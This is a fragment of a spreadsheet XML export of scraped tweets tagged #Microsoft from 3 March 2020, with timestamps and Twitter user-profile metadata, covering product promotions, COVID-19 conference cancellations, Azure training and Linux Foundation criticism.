'https://pbs.twimg.com/profile_banners/17731003/1487769044',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</si>
  <si>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Tue Mar 03 08:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Often associated with doomsday scenarios, AI is helping working parents manage work/life balance. #Microsoft https://t.co/bBO9lK3End</t>
  </si>
  <si>
    <t>Tue Mar 03 08:28:38 +0000 2020</t>
  </si>
  <si>
    <t>...yesterday, a former Microsoft employee wrote on BEHALF of the #linuxfoundation that the Foundation is no longer about Linux. Read as: it's now promoting also Windows, proprietary software of #microsoft etc.
Torvalds must take the trademark and elope fast.</t>
  </si>
  <si>
    <t>Tue Mar 03 08:27:22 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Started up a #Windows10 PC in work this morning and was greeted by a lovely picture of The Forth Bridge lit up of an evening.  Well done.  Kudos to #Microsoft for soomething for once! </t>
  </si>
  <si>
    <t>{'id': 1007208452656123904, 'id_str': '1007208452656123904', 'name': "Devil's_Advo_cat ðŸ‘¿ðŸŒ", 'screen_name': 'Garfield_1971', 'location': '', 'description': 'An absolute gold mine of misinformation (Probably). #strictly ðŸ’ƒ #motorcycles ðŸï¸ #scooters ðŸ›µ #politics #eurovision  #thegrandtour ðŸ #politics  #indyref2', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 318, 'friends_count': 330, 'listed_count': 0, 'created_at': 'Thu Jun 14 10:29:42 +0000 2018', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3529,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'http://pbs.twimg.com/profile_images/1223236858186027008/Hqw4G6Nt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223236858186027008/Hqw4G6Nt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1007208452656123904/1580477369',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</si>
  <si>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08:27:12 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft is not in #linuxfoundation to help #linux but to help #proprietary #github and #surveillance in #azure while Microsoft lawyers sue with patents (Foxconn less than a year ago) and Microsoft adds patent traps to Linux</t>
  </si>
  <si>
    <t>Tue Mar 03 08:24:43 +0000 2020</t>
  </si>
  <si>
    <t>Problem is coming in Microsoft 10 update.Please tell what is the solution in the comment?#Microsoft #Windows10 #Windows10Pro #windows10update https://t.co/bSnO6z56vA</t>
  </si>
  <si>
    <t>{'id': 1202943879571365888, 'id_str': '1202943879571365888', 'name': 'RakeshChoudhary', 'screen_name': 'RakeshChoudhare', 'location': 'New Delhi, India', 'description': 'information technology support engineer at State Bank of India', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 66, 'friends_count': 1017, 'listed_count': 0, 'created_at': 'Fri Dec 06 13:32:51 +0000 2019', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1210089564586397697/8AZTidYd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210089564586397697/8AZTidYd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1202943879571365888/1577372119',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</si>
  <si>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08:24:10 +0000 2020</t>
  </si>
  <si>
    <t>#DirectRouting for #Microsoft #Teams. Maximize your #Office365 licensing investment with Cost effective and feature Rich #calling in #MicrosoftTeams.
Get in touch with us today for simplified and fully managed #Office365 Teams Calling experience. Visit https://t.co/Pe3pxnaCrd https://t.co/JXCWCkKnkD</t>
  </si>
  <si>
    <t>{'id': 1007927867743899648, 'id_str': '1007927867743899648', 'name': 'MachCloud', 'screen_name': 'MachCloud', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Sat Jun 16 10:08:24 +0000 2018', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1141331282384830464/l1mwqGTh_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141331282384830464/l1mwqGTh_normal.png', 'profile_link_color': 'D12127',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</si>
  <si>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08:21:43 +0000 2020</t>
  </si>
  <si>
    <t>Google Cloud Next, Microsoft's MVP Summit to be held virtually 
#GoogleCloudNext #MVPSummit #Microsoft #CoronaOutbreak 
https://t.co/19bmoSNUn2</t>
  </si>
  <si>
    <t>{'id': 937962626222497793, 'id_str': '937962626222497793', 'name': 'Devdiscourse', 'screen_name': 'dev_discourse', 'location': 'National Capital Region', 'description': "Devdiscourse: World's leading Website for International Development News, Opinions, Interviews and Breaking News.", 'url': 'https://t.co/CELXEGzKqt', 'entities': {'url': {'urls': [{'url': 'https://t.co/CELXEGzKqt', 'expanded_url': 'https://www.devdiscourse.com', 'display_url': 'devdiscourse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 79873, 'friends_count': 679, 'listed_count': 63, 'created_at': 'Tue Dec 05 08:31:31 +0000 2017', 'favourites_count': 914, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 276018,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'http://pbs.twimg.com/profile_images/994485257327046656/8DSy51HP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/994485257327046656/8DSy51HP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/937962626222497793/1573131283',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</si>
  <si>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08:17:03 +0000 2020</t>
  </si>
  <si>
    <t>Here's how we manage privileged identities for on-premises and #Azure at Microsoft. #AAD #Microsoft #security #MicrosoftSecurity https://t.co/DRsWjM5U40</t>
  </si>
  <si>
    <t>Tue Mar 03 08:16:10 +0000 2020</t>
  </si>
  <si>
    <t>Helaas, geen #Microsoft #ignite dit jaar vanwege #corona. #COVID19 
As a result, Microsoft is cancelling the Microsoft Ignite The Tour Amsterdam conference, originally scheduled to take place at RAI Amsterdam on March 11-12, 2020</t>
  </si>
  <si>
    <t>{'id': 226639728, 'id_str': '226639728', 'name': 'Michael Stols ðŸ¤§â˜£ï¸â˜£ï¸ðŸ¥´ðŸ˜‰', 'screen_name': 'mstols', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 105, 'listed_count': 4, 'created_at': 'Tue Dec 14 17:52:22 +0000 2010', 'favourites_count': 574, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1041,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'http://pbs.twimg.com/profile_images/848525914078150656/GHltPXiS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/848525914078150656/GHltPXiS_normal.jpg',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</si>
  <si>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08:15:52 +0000 2020</t>
  </si>
  <si>
    <t>Xbox has revealed two new swanky looking controllers. Personally the Phantom Magenta one looks amazing.
https://t.co/uIBYUODE3p
#Xbox #XboxOne #Microsoft #SpecialEdition #Games #Gaming #Controllers</t>
  </si>
  <si>
    <t>{'id': 1086387948621385728, 'id_str': '1086387948621385728', 'name': 'NerdyBirdGames', 'screen_name': 'NerdyBirdGames', 'location': 'England, United Kingdom', 'description': 'Nerdy Bird Games, bringing you the latest gaming news, reviews and articles. https://t.co/rJt2qFIcRj', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/rJt2qFIcRj', 'expanded_url': 'https://nerdybirdgames.home.blog/', 'display_url': 'nerdybirdgames.home.blog', 'indices': [77, 100]}]}}, 'protected': False, 'followers_count': 190, 'friends_count': 261, 'listed_count': 3, 'created_at': 'Fri Jan 18 22:20:45 +0000 2019', 'favourites_count': 162, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 446,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'http://pbs.twimg.com/profile_images/1086388612617457664/DBBTI4Au_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1086388612617457664/DBBTI4Au_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1086387948621385728/1547899296',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</si>
  <si>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08:15:29 +0000 2020</t>
  </si>
  <si>
    <t>Xbox has revealed two new swanky looking controllers. Personally the Phantom Magenta one looks amazing.
https://t.co/JRjYvP7wle
#Xbox #XboxOne #Microsoft #SpecialEdition #Games #Gaming #Controllers</t>
  </si>
  <si>
    <t>{'id': 123049905, 'id_str': '123049905', 'name': 'Jake - Nerdy Bird - #SafeInOurWorld', 'screen_name': 'Darksonic22', 'location': 'Gloucestershire', 'description': 'Mad about games and I write about em here! https://t.co/emBgUXCNnD Mental Health Fighting @ #SafeInOurWorld - Email - Jakenbgames22@outlook.com', 'url': 'https://t.co/heIXxROyH4', 'entities': {'url': {'urls': [{'url': 'https://t.co/heIXxROyH4', 'expanded_url': 'https://nerdybirdgames.com/', 'display_url': 'nerdybirdgames.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/emBgUXCNnD', 'expanded_url': 'http://nerdybirdgames.com', 'display_url': 'nerdybirdgames.com', 'indices': [43, 66]}]}}, 'protected': False, 'followers_count': 923, 'friends_count': 866, 'listed_count': 68, 'created_at': 'Sun Mar 14 20:37:42 +0000 2010', 'favourites_count': 14651, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13688,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'http://pbs.twimg.com/profile_images/1227234432697937921/vvGGIIW4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227234432697937921/vvGGIIW4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/123049905/1567248050',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</si>
  <si>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Tue Mar 03 08:15:26 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 08:15:16 +0000 2020</t>
  </si>
  <si>
    <t>That's really cool, Microsoft Powers you On
#Robotic #Process #Automation with #Microsoft #Power #Automate, #UI #flows and #AI #Builder
Automatically process complex tasks such as invoicing with Microsoft Power Automate. You'll s...https://t.co/54SG7PFyvK https://t.co/pdaEY7VFTj</t>
  </si>
  <si>
    <t>{'id': 336409635, 'id_str': '336409635', 'name': 'Massimiliano Ardito', 'screen_name': 'ioardito', 'location': '', 'description': '', 'url': 'https://t.co/NMlVgkMtiS', 'entities': {'url': {'urls': [{'url': 'https://t.co/NMlVgkMtiS', 'expanded_url': 'https://it.linkedin.com/in/arditomassimiliano', 'display_url': 'it.linkedin.com/in/arditomassiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 68, 'friends_count': 47, 'listed_count': 33, 'created_at': 'Sat Jul 16 07:26:40 +0000 2011', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2804,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'http://pbs.twimg.com/profile_images/739577725367779328/JiCwjx3X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/739577725367779328/JiCwjx3X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/336409635/1464621381',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</si>
  <si>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Tue Mar 03 08:13:17 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft My works make shore my posts on google map is posting and posted where I posts from this phone.</t>
  </si>
  <si>
    <t>{'id': 1202091374, 'id_str': '1202091374', 'name': 'Michael Briggs', 'screen_name': 'DellCreator', 'location': 'United States', 'description': 'I am owner of Dell and Paul Allen is my first partner and Elvis Presley is my partner.', 'url': 'https://t.co/RhdOgVH7Yy', 'entities': {'url': {'urls': [{'url': 'https://t.co/RhdOgVH7Yy', 'expanded_url': 'http://www.Facebook.com/michaelevansbriggs', 'display_url': 'Facebook.com/michaelevansbrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 30, 'friends_count': 358, 'listed_count': 0, 'created_at': 'Wed Feb 20 20:32:49 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3920,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'http://pbs.twimg.com/profile_images/1218441105412325377/oqMU4MdZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218441105412325377/oqMU4MdZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1202091374/1558790025',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</si>
  <si>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08:13:16 +0000 2020</t>
  </si>
  <si>
    <t>{'id': 2612922666, 'id_str': '2612922666', 'name': 'Michael Briggs', 'screen_name': 'ElvisWorksForMe', 'location': 'Michigan, USA', 'description': 'I am diamonds creator inventor of my diamond and Paul Allen is my first partner and Elvis Presley is my partner.', 'url': 'https://t.co/jN1CROsIKC', 'entities': {'url': {'urls': [{'url': 'https://t.co/jN1CROsIKC', 'expanded_url': 'http://www.facebook.com/appleownerr', 'display_url': 'facebook.com/appleownerr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 58, 'friends_count': 314, 'listed_count': 12, 'created_at': 'Wed Jul 09 04:43:21 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3821,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'http://pbs.twimg.com/profile_images/1231145607361957889/2kwyuRAO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231145607361957889/2kwyuRAO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2612922666/1499556636',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</si>
  <si>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{'id': 748694346141085696, 'id_str': '748694346141085696', 'name': 'Michael Briggs', 'screen_name': 'Elvisdeathfake', 'location': 'Cutlerville, MI', 'description': 'I own intel &amp; Apple &amp; IBM &amp; HP and microsoft &amp; Dell &amp; Paul Allen is my first partner and Elvis Presley is my partner.', 'url': 'https://t.co/h7HfL4uK2c', 'entities': {'url': {'urls': [{'url': 'https://t.co/h7HfL4uK2c', 'expanded_url': 'http://Facebook.com/michaelevsnsbriggs', 'display_url': 'Facebook.com/michaelevsnsbrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 70, 'listed_count': 0, 'created_at': 'Fri Jul 01 01:46:57 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1413, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1217773930947186690/lHgx3-Ym_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217773930947186690/lHgx3-Ym_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/748694346141085696/1489146888',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</si>
  <si>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{'id': 1230741417678364672, 'id_str': '1230741417678364672', 'name': 'Michael Briggs', 'screen_name': 'realMacApple', 'location': 'Michigan, USA', 'description': 'I am Mac of Apple owner of Apple Incorporation. Paul Allen is my first partner and Elvis Presley is my partner.', 'url': 'https://t.co/4rETnHXrlE', 'entities': {'url': {'urls': [{'url': 'https://t.co/4rETnHXrlE', 'expanded_url': 'http://www.facebook.com/michaelevansbriggs', 'display_url': 'facebook.com/michaelevansbrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 6, 'listed_count': 0, 'created_at': 'Fri Feb 21 06:32:36 +0000 2020', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 209, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1230749902738579456/eVII-1Nf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230749902738579456/eVII-1Nf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1230741417678364672/1582268655',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</si>
  <si>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{'id': 4411436596, 'id_str': '4411436596', 'name': 'Michael Briggs', 'screen_name': 'chipinventor', 'location': 'United States', 'description': "I'm creator and architect of the chip and microchip and Paul Allen is my first partner and Elvis Presley is my partner.", 'url': 'https://t.co/hInRzpH5tD', 'entities': {'url': {'urls': [{'url': 'https://t.co/hInRzpH5tD', 'expanded_url': 'https://www.facebook.com/michaelevansbriggs', 'display_url': 'facebook.com/michaelevansbrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 61, 'listed_count': 0, 'created_at': 'Tue Dec 08 03:03:53 +0000 2015', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 254,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'http://pbs.twimg.com/profile_images/1217774633493180416/I_JuC5rS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217774633493180416/I_JuC5rS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4411436596/1499542202',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</si>
  <si>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08:12:37 +0000 2020</t>
  </si>
  <si>
    <t>@GQuattromani A device that is integrated with apps like #Skype #Microsoft Lync #Google #Hangouts #WebEx Meetings #Polycom RealPresence #Cisco Jabber #LifeSize ClearSea #Vidyo and #BlueJeans. #Prijector #Newyear2020 https://t.co/ZpFewqrIFs</t>
  </si>
  <si>
    <t>Tue Mar 03 08:12:23 +0000 2020</t>
  </si>
  <si>
    <t>#Nokia Corporation Pekka Lundmark Appointed President And Ceo Of Nokia; Rajeev Suri To Step Down  https://t.co/ME8IUApiGh  #microsoft killed it: https://t.co/ii9OOF2xrf</t>
  </si>
  <si>
    <t>Tue Mar 03 08:11:28 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/uXXyehWn0G</t>
  </si>
  <si>
    <t>{'id': 766361430581010432, 'id_str': '766361430581010432', 'name': 'Flexicom Solutions', 'screen_name': 'FlexicomSol', 'location': 'South East, England', 'description': 'Speak to us about all your Business IT &amp; Communications requirements. We also specialise in GDPR Compliance for SMEs\nCall: 0800 612 7925', 'url': 'https://t.co/DMNh4OhEHw', 'entities': {'url': {'urls': [{'url': 'https://t.co/DMNh4OhEHw', 'expanded_url': 'http://flexicomsolutions.com', 'display_url': 'flexicomsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 259, 'friends_count': 686, 'listed_count': 4, 'created_at': 'Thu Aug 18 19:49:38 +0000 2016', 'favourites_count': 364, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1248,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'http://pbs.twimg.com/profile_images/766362637458341888/vX75lzNC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/766362637458341888/vX75lzNC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/766361430581010432/1511011366',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</si>
  <si>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08:11:21 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/4uICJIvTWJ</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/tiNupUVL3I</t>
  </si>
  <si>
    <t>Tue Mar 03 08:11:19 +0000 2020</t>
  </si>
  <si>
    <t>What will points-based immigration mean for IT recruitment? https://t.co/lF9MpvnW1I via @Hybrid_Circle #VMware #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 08:10:27 +0000 2020</t>
  </si>
  <si>
    <t>Title: First Time Login
Training By: Mohammad Nouman Khan
Platform: Microsoft Azure Cloud Platform
#azure #cloud #microsoftazure #cloudcomputing #cloudsecurity #microsoft #hybridcloud
https://t.co/yF3CZaFUaT</t>
  </si>
  <si>
    <t>{'id': 143441259, 'id_str': '143441259', 'name': 'Mohammad Nouman Khan', 'screen_name': 'DarkAges909', 'location': 'United Arab Emirates', 'description': 'I am Human!!!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 39, 'friends_count': 740, 'listed_count': 0, 'created_at': 'Thu May 13 13:34:30 +0000 2010', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1075329218806980609/OHm94jTC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1075329218806980609/OHm94jTC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/143441259/1545213437',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</si>
  <si>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08:09:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 Business Central Training from the experts
https://t.co/tFwmVpgHzv
#businesscentral #d365 #dynamics365 #erp #Microsoft #Southampton #Fareham #whiteley #Portsmouth https://t.co/ifF8RuFfpC</t>
  </si>
  <si>
    <t>Tue Mar 03 08:07:17 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Microsoft Awards UW Funds to Apply Artificial Intelligence Technology to Dataset Analysis | News - University of Wyoming News https://t.co/HqhjR9yOL4  #Robotics  #Data  #DataScience  #BigData  #Technology  #ArtificialIntelligence  #AI  #Automation  #Machin...</t>
  </si>
  <si>
    <t>{'id': 2855732137, 'id_str': '2855732137', 'name': 'Artificial Intelligence', 'screen_name': 'AIVids', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2195, 'friends_count': 63, 'listed_count': 14, 'created_at': 'Tue Oct 14 15:26:44 +0000 2014', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20536,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'http://pbs.twimg.com/profile_images/1124815603749904384/X0Ehn1Tx_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1124815603749904384/X0Ehn1Tx_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2855732137/1413378973',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</si>
  <si>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08:06:28 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft just canceled two conferences ahead of their major ones https://t.co/SgaokYpU1z</t>
  </si>
  <si>
    <t>Tue Mar 03 08:05:04 +0000 2020</t>
  </si>
  <si>
    <t>VERY excited to be in Brussels this week for #Microsofts #DataScience &amp;amp; Law Forum. Hearing from @EU_Commission @Microsoft @PartnershipAI + others on #AI policy direction &amp;amp; responsible development in #MachineLearning &amp;amp; #QuantumComputing #MSFTEU https://t.co/LxNg4Iwyqg https://t.co/lJonOW1bjw</t>
  </si>
  <si>
    <t>Tue Mar 03 08:02:56 +0000 2020</t>
  </si>
  <si>
    <t>Don't be fooled. #Cloud and on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains.    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/1qRWQdJof3</t>
  </si>
  <si>
    <t>{'id': 1188931963073286144, 'id_str': '1188931963073286144', 'name': 'Comis Technology - IT Support &amp; Services (London)', 'screen_name': 'ComisTechnology', 'location': 'Soho/Mayfair, London, W1B 5TD', 'description': 'ðŸ–¥Professional IT Solutions &amp; Services across London and the UK. 15yrs in business. ðŸ“©Email enquiries to: contact@comistechnology.co.uk orðŸ“žCall us 02037407190', 'url': 'https://t.co/pe1jBwqX7V', 'entities': {'url': {'urls': [{'url': 'https://t.co/pe1jBwqX7V', 'expanded_url': 'http://www.comistechnology.co.uk', 'display_url': 'comistechnology.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 365, 'listed_count': 0, 'created_at': 'Mon Oct 28 21:34:24 +0000 2019', 'favourites_count': 32, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 173, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1189167797580042241/zhjG-cnU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189167797580042241/zhjG-cnU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1188931963073286144/1577956456',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</si>
  <si>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08:02:10 +0000 2020</t>
  </si>
  <si>
    <t>Out-of-the-box business process automation is making a huge difference for customers. Watch how #MSDyn365BC puts your customers in the limelightwhere they belong! Watch now:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/NPx22YsQa6</t>
  </si>
  <si>
    <t>Tue Mar 03 08:01:49 +0000 2020</t>
  </si>
  <si>
    <t>My Sea of Thieves fam. Don't miss us every Tuesday at 8pm EST we are The one The only "GROG Females" #QWGstream #girlstreamers #twitch #lgbt #twitchgirls #girlgamer #twitchaffiliate #TKLove #twitch #SeaOfThieves #Microsoft @RareLtd #rareLtd WonderingRaven Not shown is captain https://t.co/r3XTc7zG0b</t>
  </si>
  <si>
    <t>{'id': 2364164520, 'id_str': '2364164520', 'name': 'TeraBell', 'screen_name': 'SteamPoweredHrt', 'location': '', 'description': 'Transsexual Non-Binary Gender Public Figure.. Living Their Life', 'url': 'https://t.co/6m433sYCCg', 'entities': {'url': {'urls': [{'url': 'https://t.co/6m433sYCCg', 'expanded_url': 'https://twitch.tv/TeraBell', 'display_url': 'twitch.tv/TeraBell', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 501, 'friends_count': 517, 'listed_count': 15, 'created_at': 'Thu Feb 27 13:20:44 +0000 2014', 'favourites_count': 1371, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4045,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'http://pbs.twimg.com/profile_images/1197778370328715264/hrzFppdb_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197778370328715264/hrzFppdb_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2364164520/1573431319',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</si>
  <si>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08:01:41 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/9GWiRnCLWf</t>
  </si>
  <si>
    <t>{'id': 576260364, 'id_str': '576260364', 'name': 'Fast 4 You', 'screen_name': 'Fast_4_You', 'location': 'zaandam', 'description': 'Fast 4 You :|: Powerful SSD hosting!', 'url': 'http://t.co/7KDB6MxIHR', 'entities': {'url': {'urls': [{'url': 'http://t.co/7KDB6MxIHR', 'expanded_url': 'http://www.fast4you.eu', 'display_url': 'fast4you.eu', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 54, 'friends_count': 78, 'listed_count': 1, 'created_at': 'Thu May 10 12:09:11 +0000 2012', 'favourites_count': 4871, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 262,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'http://pbs.twimg.com/profile_images/3367405082/9e6bf04af95c8b6da76b8c45509302ae_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3367405082/9e6bf04af95c8b6da76b8c45509302ae_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/576260364/1381155642', 'profile_link_color': 'FF8C00',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</si>
  <si>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Tue Mar 03 08:00:49 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 08:00:21 +0000 2020</t>
  </si>
  <si>
    <t>Having a compliant #Azure environment is very important, but many companies fail to implement Azure governance correctly.
On the upcoming #AzureFest event we have #Microsoft #MVP @SjoukjeZaal guiding us through @AzureBlueprint, Azure Policy and more! 
Save the date, 28th of May! https://t.co/jk11SaiHLG</t>
  </si>
  <si>
    <t>Tue Mar 03 08:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Rancho Los Amigos National Rehabilitation Center doctors aim to reduce #diabetes-related #amputations with #Azure #IoT Central - #Microsoft #HealthCare #FHIR @dgarmstrong @healthpilot #Sensoria https://t.co/v9w14LAR1y #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 07:56:36 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft CEO #SatyaNadella Wins Global Indian Business Icon https://t.co/3mSDwUIxco</t>
  </si>
  <si>
    <t>{'id': 805725399124561920, 'id_str': '805725399124561920', 'name': 'Watch Your Mojo', 'screen_name': 'NowOnlyFacts', 'location': 'India', 'description': 'Follow us on:\nhttps://t.co/2DR5D9g1ww\n\nYouTube: https://t.co/KDjhxy8pmU', 'url': 'https://t.co/BZAoHw6zMJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/BZAoHw6zMJ', 'expanded_url': 'http://www.watchyourmojo.com', 'display_url': 'watchyourmojo.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/2DR5D9g1ww', 'expanded_url': 'https://www.facebook.com/IndianTrendingFacts/', 'display_url': 'facebook.com/IndianTrendingâ€¦', 'indices': [14, 37]}, {'url': 'https://t.co/KDjhxy8pmU', 'expanded_url': 'https://goo.gl/4J7C8o', 'display_url': 'goo.gl/4J7C8o', 'indices': [48, 71]}]}}, 'protected': False, 'followers_count': 727, 'friends_count': 430, 'listed_count': 3, 'created_at': 'Mon Dec 05 10:47:59 +0000 2016', 'favourites_count': 2092, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4148, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/968080619598176256/KLmDcfws_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/968080619598176256/KLmDcfws_normal.jpg', 'profile_banner_url': 